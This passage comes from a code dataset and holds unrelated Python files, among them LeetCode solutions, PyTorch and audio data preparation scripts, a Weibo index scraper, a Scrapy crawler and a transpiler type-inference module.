self.test_file))\n\nif __name__ == '__main__':\n trainset = MNIST(root='/mount/wd/data/mnist', train=True)\n x,y = trainset.debug_getitem__()","sub_path":"vggish_datasets.py","file_name":"vggish_datasets.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"592526574","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/9/25 7:33 PM\n# 
@Author : zhongch4g\n# @Site : \n# @File : 300. Longest Increasing Subsequence.py\n# @Software: IntelliJ IDEA\n\n\nclass Solution:\n def lengthOfLIS(self, nums) -> int:\n length = len(nums)\n if length == 0:\n return 0\n\n f = [0 for i in range(length)]\n longest = 0\n # print a path\n pi = [0 for i in range(length)]\n end_point = 0\n for i in range(length):\n f[i] = 1\n pi[i] = -1\n for j in range(i + 1):\n if nums[j] < nums[i]:\n f[i] = max(f[j] + 1, f[i])\n if f[i] == f[j] + 1:\n pi[i] = j\n longest = max(longest, f[i])\n if longest == f[i]:\n end_point = i\n res = [0 for i in range(longest)]\n for i in range(longest - 1, -1, -1):\n res[i] = nums[end_point]\n end_point = pi[end_point]\n for i in range(longest):\n print(res[i])\n return longest\n\n","sub_path":"LeetCode/300. Longest Increasing Subsequence.py","file_name":"300. Longest Increasing Subsequence.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"316870078","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport random\nfrom typing import Iterable\nfrom objects import *\nfrom objects._session import session\nfrom utils.config import Config\nfrom nets.tasks.e2e import E2ENet\n\n\nclass E2EBeam(Beam):\n def __init__(self, *args, **kwargs):\n self.timestamp = ''\n self.duration, self.fps, self.num_bricks, self.num_frames = 0, 0, 0, 0\n self.resolution = [0, 0]\n super().__init__(E2EBrick, *args, **kwargs)\n\n @property\n def valid(self) -> bool:\n return abs(self.beam.config['constants']['runningFps'] - self.fps) / self.beam.config['constants']['runningFps'] < 0.1\n\n\nclass E2EBrick(Brick):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n @property\n def valid(self) -> bool:\n steering, accel = self.truth['steering'], self.truth['accel']\n if steering is None or accel is None:\n validity = False\n else:\n validity = -90. <= steering <= 90. and -20. 
<= accel <= 20.\n return validity\n\n def get_input(self):\n input_data = session.read_hdf5(filepath=self.beam.hdf5_path,\n dataset_id=self.beam.dataset_id,\n start_frame=self.frame - self.beam.config['constants']['runningFps'] + 1,\n end_frame=self.frame + 1)\n return torch.FloatTensor(input_data)\n\n def get_metadata(self):\n rand_state = random.getstate()\n random.seed()\n\n action = random.choice(self.metadata['actions'])\n steering_meta = -1\n\n if 'rightTurn' == action:\n steering_meta = 1\n elif 'leftTurn' == action:\n steering_meta = 2\n elif 'None' == action:\n steering_meta = 0\n\n random.setstate(rand_state)\n return torch.LongTensor(np.array([steering_meta]))\n\n def get_truth(self):\n steering, accel, motor = self.truth['steering'], self.truth['accel'], self.truth['motor']\n return torch.FloatTensor(np.array([steering, accel, motor]))\n\n\nclass E2EDataset(Dataset):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._stds = torch.FloatTensor(self._normalize_bricks(self.train_bricks))\n\n def _normalize_bricks(self, train_bricks=None):\n train_bricks = train_bricks or self.train_bricks\n steering = np.array([brick.truth['steering'] for brick in train_bricks])\n accel = np.array([brick.truth['accel'] for brick in train_bricks])\n motor = np.array([brick.truth['motor'] for brick in train_bricks])\n return np.array([np.std(steering), np.std(accel), np.std(motor)])\n\n def get_posthook(self, input, metadata, truth):\n return input, metadata, truth / self._stds\n\n def load_beam(self, filepath: str) -> Iterable[Brick]:\n beam = E2EBeam(filepath=filepath, config=self.config)\n bricks = beam.get_bricks(exclude_invalid=True,\n sort_by=lambda brick: brick.frame,\n filter_by=lambda brick: (brick.frame >= beam.config['constants']['inputFrames']),\n filter_posthook=lambda bricks: bricks[:-1])\n return bricks\n\n\nclass E2ETask(Task):\n def __init__(self, name: str, config: Config, load_dataset=True):\n dataset = E2EDataset(config=config, dirpath=config['tasks']['e2e']['dataset']['dirPath']) if load_dataset else None\n opt_kwargs = {'eps': 1e-4}\n super().__init__(name, config, dataset, E2ENet, nn.MSELoss, optim.Adam, opt_kwargs=opt_kwargs)\n\n\nTask = E2ETask\n","sub_path":"tasks/e2e.py","file_name":"e2e.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"8510894","text":"#!/root/anaconda3/envs/kalditorch/bin/python\n\n\n\n#----- import packages\n\nimport argparse\nimport os\nimport sys\nimport pathlib\nimport re\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport time\n\n\nif __name__ == \"__main__\":\n start = time.time()\n parser = argparse.ArgumentParser(description='This program process the data from Siwis \\\n database (https://www.unige.ch/lettres/linguistique/research/latl/siwis/database/) and Musan dataset \\\n (https://www.openslr.org/17/) in order to develop an End-to-End system for signal denoising.')\n\n parser.add_argument('--main_path', type=str, required=True,\n help='Absolute path to the folder that contain SIWIS and MUSAN datasets.')\n parser.add_argument('--lang', type=list, default=['EN'],\n help='SIWIS contains different languages: English, Italian, French, Dutch. 
Default system use only English audios.')\n parser.add_argument('--min_length', type=float, required=True,\n help='The minimum duration for the audio files to be considered from the system.')\n parser.add_argument('--test_size', type=float, default=.1,\n help='Size for test set audios.')\n parser.add_argument('--verbose', default=False, action='store_true')\n\n args = parser.parse_args()\n \n #----- paths\n # SIWIS database https://www.unige.ch/lettres/linguistique/research/latl/siwis/database/\n # MUSAN dataset https://www.openslr.org/17/\n \n clean_audios = 'siwis_database/wav/'\n noise_audios = 'musan'\n info_clean_audios = 'siwis_database/info'\n \n clean_audios_path = os.path.join(args.main_path, clean_audios)\n noise_audios_path = os.path.join(args.main_path, noise_audios)\n print('\\n\\nClean audios (siwis_database) directory: {}'.format(clean_audios_path))\n print('Noise audios (musan dataset) directory: {}'.format(noise_audios_path))\n \n #----- utt2duration.scp file\n if args.verbose:\n print('\\n\\nChecking utt2duration.scp presence...')\n\n if not os.path.isdir('../data'):\n if args.verbose:\n print('Making data dir...')\n os.makedirs('../data')\n\n if not os.path.isfile('../data/utt2duration.scp'):\n if args.verbose:\n print('Making utt2duration.scp...')\n utt2duration = {}\n\n info_dir = os.listdir(os.path.join(args.main_path, info_clean_audios))\n audio_length_files = [elem for elem in info_dir if re.search('_audio_length.txt', elem)]\n\n with open('../data/utt2duration.scp', 'w') as outfile:\n durations = []\n for file in audio_length_files:\n for line in open(os.path.join(args.main_path, info_clean_audios, file)):\n utt, duration = line.rstrip().split()\n utt = utt.replace('.wav', '')\n durations.append(float(duration))\n outfile.write('{} {}\\n'.format(utt, duration))\n utt2duration[utt] = float(duration)\n\n outfile.close()\n if args.verbose:\n print('Clean audios measures:')\n print('Max: {}\\nMin: {}\\nMean: {}\\nMedian: {}'.format(max(durations), min(durations),\n np.mean(durations), np.median(durations)))\n else:\n utt2duration = {}\n for line in open('../data/utt2duration.scp'):\n utt, duration = line.rstrip().split()\n utt2duration[utt] = float(duration)\n if args.verbose:\n print('/data/utt2duration.scp file already exists.')\n \n \n \n #----- train and test wav.scp\n utts, paths, spks = [], [], []\n \n for language in args.lang:\n for folder in os.listdir(os.path.join(clean_audios_path, language)):\n for utt in os.listdir(os.path.join(clean_audios_path, language, folder)):\n tmp = os.path.join(clean_audios_path, language, folder, utt)\n if pathlib.Path(tmp).suffix == '.wav':\n if utt2duration[utt.replace('.wav', '')] > args.min_length:\n utts.append(utt.replace('.wav', ''))\n spks.append(utt.split('_')[2])\n paths.append(tmp)\n\n X_train, X_test, y_train, y_test = train_test_split(np.array(paths), np.array(utts), test_size = args.test_size, stratify = spks)\n \n if args.verbose:\n print('\\n\\nChecking train and test wav.scp presence...')\n if not os.path.isdir('../data/train'):\n os.makedirs('../data/train')\n\n if not os.path.isfile('../data/train/wav.scp'):\n if args.verbose:\n print('Making train...')\n with open('../data/train/wav.scp', 'w') as outfile:\n for train_counter, line in enumerate(np.column_stack((y_train, X_train))):\n outfile.write('{} {}\\n'.format(line[0], line[1]))\n\n outfile.close()\n\n else:\n if args.verbose:\n print('/data/train/wav.scp already exists.')\n\n if not os.path.isdir('../data/test'):\n os.makedirs('../data/test')\n\n if not 
os.path.isfile('../data/test/wav.scp'):\n if args.verbose:\n print('Making test...')\n with open('/data/test/wav.scp', 'w') as outfile:\n for test_counter, line in enumerate(np.column_stack((y_test, X_test))):\n outfile.write('{} {}\\n'.format(line[0], line[1]))\n\n outfile.close()\n if args.verbose:\n print('Detected {} audio files'.format(train_counter+test_counter))\n print('{} in train'.format(train_counter))\n print('{} in test'.format(test_counter))\n\n else:\n if args.verbose:\n print('/data/test/wav.scp already exists.')\n \n #----- noise wav.scp\n if args.verbose:\n print('\\n\\nChecking for noise wav.scp presence...')\n\n if not os.path.isfile('../data/musan_noise.scp'):\n\n if args.verbose:\n print('Make musan.scp')\n counter = {}\n\n for folder in os.listdir(noise_audios_path):\n if os.path.isdir(os.path.join(noise_audios_path, folder)):\n if args.verbose:\n print('Making musan_{}.scp'.format(folder))\n with open('../data/musan_{}.scp'.format(folder), 'w') as file:\n for subfolder in os.listdir(os.path.join(noise_audios_path, folder)):\n if os.path.isdir(os.path.join(noise_audios_path, folder, subfolder)):\n for utt in os.listdir(os.path.join(noise_audios_path, folder, subfolder)):\n if utt.endswith('.wav'):\n file.write('{} {}\\n'.format(utt.replace('.wav', ''),\n os.path.join(noise_audios_path, folder, subfolder, utt)))\n if folder in counter:\n counter[folder] += 1\n else:\n counter[folder] = 1\n\n file.close()\n if args.verbose:\n print('Detected {} noise audios'.format(sum(counter.values())))\n print(counter)\n\n else:\n if args.verbose:\n print('musan noise wav files already exists.')\n \n #----- utt2spk.scp\n if args.verbose:\n print('\\n\\nChecking for utt2spk.scp presence...')\n\n if not os.path.isfile('../data/utt2spk.scp'):\n\n list_of_speakers = set()\n with open('../data/utt2spk.scp', 'w') as file:\n for line in open('../data/train/wav.scp'):\n utt, path = line.split()\n spk = utt.split('_')[2]\n list_of_speakers.add(spk)\n file.write('{} {}\\n'.format(utt, spk))\n\n for line in open('../data/test/wav.scp'):\n utt, path = line.split()\n spk = utt.split('_')[2]\n list_of_speakers.add(spk)\n file.write('{} {}\\n'.format(utt, spk))\n\n file.close()\n if args.verbose:\n print('{} speakers'.format(len(list_of_speakers)))\n\n else:\n if args.verbose:\n print('/data/utt2spk.scp already exists.')\n end = time.time()\n \n print('{} executed in {:.2f} s'.format(sys.argv[0], (end-start)))","sub_path":"pyscripts/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":8337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"277969704","text":"# Runtime: 216 ms, faster than 57.96% of Python online submissions for Number of Equivalent Domino Pairs.\n# Memory Usage: 24.1 MB, less than 100.00% of Python online submissions for Number of Equivalent Domino Pairs.\n\nclass Solution(object):\n def numEquivDominoPairs(self, dominoes):\n \"\"\"\n :type dominoes: List[List[int]]\n :rtype: int\n \"\"\"\n \n d = {}\n for i in dominoes:\n mn = min(i[0],i[1])\n mx = max(i[0],i[1])\n domino = (mn, mx)\n d[domino] = d.get(domino,0) + 1\n \n ans = 0\n for i in d:\n ans += d[i] * (d[i] - 1) / 2\n \n return ans","sub_path":"Leetcode/Arrays/Easy/1128_number_of_equivalent_domino_pairs.py","file_name":"1128_number_of_equivalent_domino_pairs.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"503478477","text":"\n\nfrom 
xai.brain.wordbase.nouns._duty import _DUTY\n\n#calss header\nclass _DUTIES(_DUTY, ):\n\tdef __init__(self,): \n\t\t_DUTY.__init__(self)\n\t\tself.name = \"DUTIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"duty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_duties.py","file_name":"_duties.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"123421980","text":"\nfrom __future__ import print_function\nimport numpy as np\nimport random\nimport datetime\nimport argparse\nimport matplotlib as mpl\nmpl.use('Agg', warn=False)\nimport matplotlib.pyplot as plt\nfrom nn_mnist_jellyfish import NeuralNetwork\nimport mnist\nimport utils\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-n', action=\"store\", dest=\"mnist_number\")\nparser.add_argument('-i', action=\"store\", dest=\"iterations\", default=25000, help=\"default: 25000\")\nargs = parser.parse_args()\nmnist_number = int(args.mnist_number)\niterations = int(args.iterations)\n\n# images choice indexes = [181, 100, 333, 100, 3282, 5239, 5070, 893, 2117, 5712]\n\npf = lambda x: (1 / (1 + np.exp(-1 * 10 * x)) - .5) * 1.8 + .05\nnn = NeuralNetwork(strength_function=pf)\n\nimgs = mnist.get_imgs_by_number(mnist_number)\ni = random.choice(range(len(imgs)))\nimg = imgs[i][1]\nprint('%s: %s' % (mnist_number, i))\n\nstart_time = datetime.datetime.now()\n\nplotting_strength = True\nif plotting_strength: strength_stats = []\n\nfor i in range(iterations):\n nn.propagate_once(img)\n if plotting_strength:\n if i % 10 == 0: strength_stats.append(nn.stats()['strength'])\n\nend_time = datetime.datetime.now()\nprint('start time:', start_time)\nprint('stop time: ', end_time)\n\nif plotting_strength:\n plt.plot(strength_stats)\n plt.savefig('./png/nn_mnist_jellyfish_%s.png' % mnist_number)\n\nutils.write_pickle(nn.connections_matrix, './pkl/nn_mnist_jellyfish_%s.pkl' % mnist_number)\n\n","sub_path":"backup/nn_mnist_jellyfish_train.py","file_name":"nn_mnist_jellyfish_train.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"223059672","text":"# coding=utf-8\nimport json\nimport os\nfrom urllib import parse\n\nimport requests\nimport xlrd\n\nRootdir = os.path.abspath(os.path.dirname(os.getcwd()))\nExceldir = Rootdir + r\"\\Dataset\\播放社交全.xls\"\nSheet = \"Sheet1\"\ndate_start = \"2014-01-01\"\ndate_stop = \"2017-07-09\"\n\n\ndef read_xls_file(directory, sheet):\n xls = xlrd.open_workbook(directory)\n s = xls.sheet_by_name(sheet)\n cols = s.col_values(0)\n return cols\n\n\ndef savejson(soapname, data):\n fl = open('../OutPut/figures/' + soapname + '.json', 'w')\n fl.write(json.dumps(data, ensure_ascii=False, indent=2))\n fl.close()\n\n\ndef search_name(name):\n url_format = \"http://data.weibo.com/index/ajax/hotword?word={}&flag=nolike&_t=0\"\n\n # 伪造cookie\n cookie_header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36\",\n \"Referer\": \"http://data.weibo.com/index?sudaref=www.google.com\"\n }\n # 汉字转为%编码\n urlname = parse.quote(name)\n # 将{}替换为关键词\n first_requests = url_format.format(urlname)\n print(first_requests)\n\n codes = requests.get(first_requests, headers=cookie_header).json()\n\n print(codes)\n\n # 获取关键词代码\n ids = codes[\"data\"][\"id\"]\n\n # 伪造完整包头\n header = {\n \"Connection\": \"keep-alive\",\n \"Accept-Encoding\": \"gzip, deflate, 
sdch\",\n \"Accept\": \"*/*\",\n \"User-Agent\": \"ksoap2-android/2.6.0+\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n \"Referer\": \"http://data.weibo.com/index/hotword?wid={}&wname={}\".format(ids, urlname),\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Host\": \"data.weibo.com\"\n }\n\n # 获取日期\n date_url = \"http://data.weibo.com/index/ajax/getdate?month=1&__rnd=1498190033389\"\n dc = requests.get(date_url, headers=header).json()\n edate, sdate = dc[\"edate\"], dc[\"sdate\"]\n print(dc)\n # 数据返回\n # 指定月份指数数据\n # getchartdata?month=3&_rnd=时间戳\n # ?month为月份跨度\n\n # 日期数据\n # getdate?month=3&_rnd=时间戳\n # ?month为月份跨度\n print(codes)\n codes = requests.get(\"http://data.weibo.com/index/ajax/getchartdata?wid={}&sdate=2017-01-01&edate=2017-10-30\".format(ids, sdate, edate), headers=header).json()\n\n return codes\n\n # 指定日期区间获取微指数数据url\n # http://data.weibo.com/index/ajax/getchartdata?wid=1061704100000146164&sdate=2017-09-01&edate=2017-09-07&__rnd=1504856390847\n # sdate起始日期\n # edate截止日期\n # 伪造包头Referer格式\n # http://data.weibo.com/index/hotword?wid=1061704100000146164&wname=%E4%BA%BA%E6%B0%91%E7%9A%84%E5%90%8D%E4%B9%89\n # &wid为关键词代码\n # &wname为%格式化后的关键词\n\n\nif __name__ == \"__main__\":\n # 自动爬取新浪微博微指数,结果保存于Output/14to17\n dataless = [\"女管家\", \"飘洋过海来看你\", \"守护丽人\"]\n figures = {\"杨幂\", \"刘涛\"}\n for figure in figures:\n savejson(figure, search_name(figure))\n # 以上为未收录数据\n # presoap = [\"楚乔传\", \"醉玲珑\", \"我的前半生\", \"上古情歌\"]\n # for soap in presoap:\n # if os.path.exists('../OutPut/14to17/' + soap + '.json'):\n # print(soap + \"已保存过\")\n # continue\n # if soap == \"\" or dataless.__contains__(soap):\n # continue\n # savejson(soap, search_name(soap))\n # print(soap + \"已保存\")\n\n # print(\"已完成\")\n # for soap in read_xls_file(Exceldir, Sheet):\n # if os.path.exists('../OutPut/14to17/' + soap + '.json'):\n # print(soap + \"已保存过\")\n # continue\n # if soap == \"\" or dataless.__contains__(soap):\n # # 爱情公寓四未收录,以爱情公寓为关键词查询\n # continue\n # savejson(soap, search_name(soap))\n # print(soap + \"已保存\")\n print(\"已完成\")\n","sub_path":"Weibo/WeiIndex.py","file_name":"WeiIndex.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"476494772","text":"#!/usr/bin/env python\n\nimport time\nprint(time.tzname)\n\n# print(\"starting...\", end='', flush=True)\n# time.sleep(1.5)\n# print('done')\n\n# 8/14/2012\nfrom datetime import date, timedelta\n\nisabelle_bd = date(2012, 8, 14)\ntoday = date.today()\n\nprint(isabelle_bd, today)\n\nelapsed = today - isabelle_bd\n\nyears, days = divmod(elapsed.days, 365)\n\nprint(\"Isabelle is {} years and {} days old\".format(\n years, days\n))\n\ntwo_weeks = timedelta(14, 7200)\n\nthen = today + two_weeks\n\nprint(then)\n\n","sub_path":"dates_and_times.py","file_name":"dates_and_times.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"351210870","text":"import os\nimport re\n\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nimport w3lib.url\nimport mimetypes\n\n\nclass FullSpider(CrawlSpider):\n name = 'FullSpider'\n allowed_domains = ['iitg.ernet.in']\n\n dict_extensions = {\n 'document': {'.doc', '.docx', '.pdf', '.ppt','.pwz', '.pptx', '.odt', '.ott', '.rtf', '.txt'},\n 'image': {'.jpeg', '.jpg', '.jpe', '.png', '.tif', '.tiff', '.gif', '.webp', '.svg', '.bmp'},\n }\n\n repo_links = re.compile(\n 
\".*intranet\\.iitg\\.ernet\\.in/repo/.*|.*jatinga\\.iitg\\.ernet\\.in/~csesoftwarerepo/.*\"\n )\n\n if not os.path.exists('Links/Full/responsed'):\n os.makedirs('Links/Full/responsed')\n\n if not os.path.exists('Links/Full/found'):\n os.makedirs('Links/Full/found')\n\n content_link_file = open(r'Links/Full/responsed/content_links.txt', 'a+')\n doc_link_file = open(r'Links/Full/responsed/doc_links.txt', 'a+')\n image_link_file = open(r'Links/Full/responsed/image_links.txt', 'a+')\n other_link_file = open(r'Links/Full/responsed/other_links.txt', 'a+')\n repo_link_file = open(r'Links/Full/responsed/repo_links.txt', 'a+')\n\n name_link_file = open(r'Links/Full/found/name_links.txt', 'a+')\n doc_name_link_file = open(r'Links/Full/found/doc_name_links.txt', 'a+')\n image_name_link_file = open(r'Links/Full/found/image_name_links.txt', 'a+')\n other_name_link_file = open(r'Links/Full/found/other_name_links.txt', 'a+')\n repo_name_link_file = open(r'Links/Full/found/repo_name_links.txt', 'a+')\n\n start_urls = [\n 'http://intranet.iitg.ernet.in',\n 'http://local.iitg.ernet.in',\n 'http://www.iitg.ernet.in'\n ]\n rules = (Rule(LinkExtractor(allow='iitg.ernet\\.in',\n deny=('intranet\\.iitg\\.ernet\\.in/cclrs/',\n 'csea\\.iitg\\.ernet\\.in/csea/Public/web_new/index\\.php/activities/',\n 'intranet\\.iitg\\.ernet\\.in/eventcal/',\n 'shilloi\\.iitg\\.ernet\\.in/~hss/reservation/',\n 'intranet\\.iitg\\.ernet\\.in/news/user/login\\?',\n 'local\\.iitg\\.ernet\\.in/node/46/',\n 'jatinga\\.iitg\\.ernet\\.in/~dppc/resources/resources/',\n ),\n canonicalize=True,\n deny_extensions=(),\n ),\n follow=True,\n # process_request='lets_see',\n process_links='print_before_requesting',\n callback='parse_item'\n ),\n )\n\n def print_before_requesting(self, links):\n\n for i in range(len(links)):\n clean_url = w3lib.url.url_query_cleaner(links[i].url)\n links[i].url = clean_url\n (ty, en) = mimetypes.guess_type(clean_url)\n ext2 = ''\n if ty is not None:\n ext2 = mimetypes.guess_extension(type=ty)\n\n if ext2 in FullSpider.dict_extensions['document']:\n FullSpider.doc_name_link_file.write(clean_url + '\\n')\n elif ext2 in FullSpider.dict_extensions['image']:\n FullSpider.image_name_link_file.write(clean_url + '\\n')\n elif FullSpider.repo_links.match(clean_url):\n FullSpider.repo_name_link_file.write(clean_url + '\\n')\n else:\n FullSpider.name_link_file.write(clean_url + '\\n')\n FullSpider.other_name_link_file.write(clean_url + '\\n')\n return links\n\n def lets_see(self, request):\n FullSpider.other_link_file.write(request.url + '\\n')\n return request\n\n def parse_item(self, response):\n\n # FullSpider.other_link_file.write(response.request.headers.get('Referer', None) + '\\n')\n ext = mimetypes.guess_extension(response.headers['content-type'])\n\n if ext in FullSpider.dict_extensions['document']:\n FullSpider.doc_link_file.write(response.url + '\\n')\n elif ext in FullSpider.dict_extensions['image']:\n FullSpider.image_link_file.write(response.url + '\\n')\n elif FullSpider.repo_links.match(response.url):\n FullSpider.repo_link_file.write(response.url + '\\n')\n else:\n FullSpider.content_link_file.write(response.url + '\\n')\n\n FullSpider.other_link_file.write(response.url + '\\n')\n return None\n","sub_path":"IITGSearch/spiders/FullSpider.py","file_name":"FullSpider.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"456607183","text":"class Solution:\n def isMatch(self, s, p):\n \tdp=[[False for x in 
range(len(p)+1)] for x in range(len(s)+1)]\n \tdp[0][0]=True\n \tfor j in range(0,len(p)):\n \t\tif p[j]=='*':\n \t\t\tdp[0][j+1]=dp[0][j-1]\n \tfor i in range(0,len(s)):\n \t\tfor j in range(0,len(p)):\n \t\t\tif p[j]=='*':\n \t\t\t\tif dp[i+1][j-1]:\n \t\t\t\t\tdp[i+1][j+1]=True\n \t\t\t\telif dp[i][j+1] and (p[j-1]=='.' or s[i]==p[j-1]):\n \t\t\t\t\tdp[i+1][j+1]=True\t \t\t\t\n \t\t\telse:\n \t\t\t\tif dp[i][j]==True and (s[i]==p[j] or p[j]=='.'):\n \t\t\t\t\tdp[i+1][j+1]=True\n \treturn dp[len(s)][len(p)]\n\nsolution=Solution();\ns=\"cabbbbcbcacbabc\"\np=\".*b.*.ab*.*b*a*c\"\nprint(solution.isMatch(s,p))\n\n\n\n","sub_path":"LeetCode/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"641743922","text":"'''\nError codes from server side\n'''\nERR_MISSING_CERTIFICATE = 'Permission denied (publickey).\\n'\nERR_INVALID_USER = 'ERR_INVALID_USER'\nERR_NO_GROUPS = 'ERR_NO_GROUPS'\n\n'''\nSSH configurations used by client side scripts\n'''\nSHERIFF_HOSTNAME = '192.168.184.157'\nSHERIFF_HOST_PORT = '12345'\nSHERIFF_USERNAME = 'sheriff_server'\nSHERIFF_KEY = './sheriff_id_rsa'\n\n'''\nHost configurations\nHOST_AUTH_PRINCIPALS_DIR - Where the auth_principals directory will be located\nROOT_GROUPS - Names of all the ldap groups who will have access to the ssh host\n'''\nHOST_AUTH_PRINCIPALS_DIR = '/etc/ssh/auth_principals'\nROOT_GROUPS = ['Sheriff_GroupC']\n","sub_path":"ssh_host/setup/setup_config.py","file_name":"setup_config.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"426935377","text":"import unittest\nfrom nerium import Query, ResultFormat\nfrom tests.test_setup import jinja_query_name\ntry:\n # See tests/query/jinja.jinja for template format\n import jinjasql\n class TestJinjaTemplateResult(unittest.TestCase):\n EXPECTED = [{\n 'foo': 1.25,\n 'bar': '2017-09-09',\n 'quux': 'Hello',\n 'quuux': 'Björk Guðmundsdóttir'\n }, {\n 'foo': 42,\n 'bar': '2031-05-25',\n 'quux': 'yo',\n 'quuux': 'ƺƺƺƺ'\n }]\n DIFFERS = [{\n 'foo': 1.25,\n 'bar': '2017-09-09',\n 'quuux': 'Björk Guðmundsdóttir'\n }, {\n 'foo': 42,\n 'bar': '2031-05-25',\n 'quuux': 'ƺƺƺƺ'\n }]\n\n def test_jinja_results(self):\n loader = Query(jinja_query_name, hello=\"Hello\")\n result = loader.result_set()\n formatter = ResultFormat(result, format_='default')\n formatted_results = formatter.formatted_results()\n self.assertEqual(formatted_results, self.EXPECTED)\n \n def test_jinja_default(self):\n loader = Query(jinja_query_name)\n result = loader.result_set()\n formatter = ResultFormat(result, format_='default')\n formatted_results = formatter.formatted_results()\n self.assertEqual(formatted_results, self.DIFFERS) \nexcept ImportError:\n # can't test this module without jinjasql\n pass\n\n\n","sub_path":"tests/contrib/jinja_test.py","file_name":"jinja_test.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"284004432","text":"from enum import Enum\n\nimport lex\n\nclass Types(Enum):\n STRING = 0\n NUMBER = 1\n DICT = 2\n ARRAY = 3\n TUPLE = 4\n STRUCT = 5\n FUNCTION = 6\n\nPY2CTYPES = { Types.STRING : \"std::string\", \n Types.NUMBER : \"double\", \n Types.DICT : \"std::unordered_map\",\n Types.ARRAY : \"std::vector\",\n Types.TUPLE : \"std::tuple\" }\n\nclass TypeInfo(object):\n def __init__(self, base_type, 
key_type=None, value_type=None, value_types=None):\n self.base = base_type #base corresponds to one of the Types ENUM\n self.key = key_type #key is itself a TypeInfo object \n self.value = value_type #value is itself a TypeInfo object\n self.values = value_types #value_types is used when dealing with TUPLE types\n\n def execute(self):\n value = PY2CTYPES[self.base]\n if self.base == Types.ARRAY:\n value += \"<\" + self.value.execute() + \">\"\n elif self.base == Types.TUPLE:\n value += \"<\" \n value += \", \".join([vtype.execute() for vtype in self.values])\n value += \">\"\n elif self.base == Types.DICT:\n value += \"<\" + self.key.execute() + \", \" + self.value.execute() + \">\"\n return value\n\nclass TreeManager(object):\n def __init__(self, tree):\n self.tree = tree\n self.tree_index = {}\n self.leaf_nodes = []\n self.rewrites = []\n\n for node in self.tree:\n node.visit(self._visit)\n\n self.leaf_nodes.sort(key=lambda n: n.line_number())\n\n def rewrite(self):\n for rewriter in self.rewrites:\n rewriter.rewrite(self)\n\n def visit(self, nodetype, func):\n for node in self.tree_index.get(nodetype, []):\n func(node)\n\n def _visit(self, node):\n name = node.__class__.__name__\n if node.is_leafnode():\n self.leaf_nodes.append(node)\n\n if name in self.tree_index:\n self.tree_index[name].append(node)\n else:\n self.tree_index[name] = [node]\n\nclass MapContainmentRewrite(object):\n def __init__(self, rewriter):\n self.rewriter = rewriter\n\n def _visit(self, node):\n right_type = node.right_expr.typeinfo\n if node.op.token_type == lex.Tokens.IN:\n if right_type.base == Types.DICT:\n self.rewriter(node)\n\n def rewrite(self, tree_manager):\n tree_manager.visit(\"ConditionalTest\", self._visit)\n\nclass FunctionRewrite(object):\n def __init__(self, funcname, rewriter):\n self.funcname = funcname\n self.rewriter = rewriter\n\n def _visit(self, node):\n function_name = node.identifier.value.value\n if function_name == self.funcname:\n self.rewriter(node)\n \n def rewrite(self, tree_manager):\n tree_manager.visit(\"FunctionCall\", self._visit)\n\nclass MethodRewrite(object):\n def __init__(self, funcname, rewriter):\n self.funcname = funcname\n self.rewriter = rewriter\n\n def _visit(self, node):\n function_name = node.identifier.value.value\n \n try:\n inst_type = node.parent.left_expr\n except AttributeError:\n return\n\n if function_name == self.funcname:\n self.rewriter(node)\n\n def rewrite(self, tree_manager):\n tree_manager.visit(\"FunctionCall\", self._visit)\n\nclass Inferencer(object):\n \"\"\"\n Starting from the leaf nodes of the AST, work our way back up\n the tree while setting types on each node.\n\n Many nodes will be visited more than once. A path is followed backwards from each\n leaf node. Non-leaf nodes will derive a type when enough information is \n available.\n\n Functions imported from C++ must have their return types set manually\n in order for all types to be resolved properly.\n\n The 'imported_types' dictionary holds imported function names as its keys, and \n has TypeInfo objects as corresponding values.\n\n The Inferencer should be executed before any user-defined tree rewrites\n take place. 
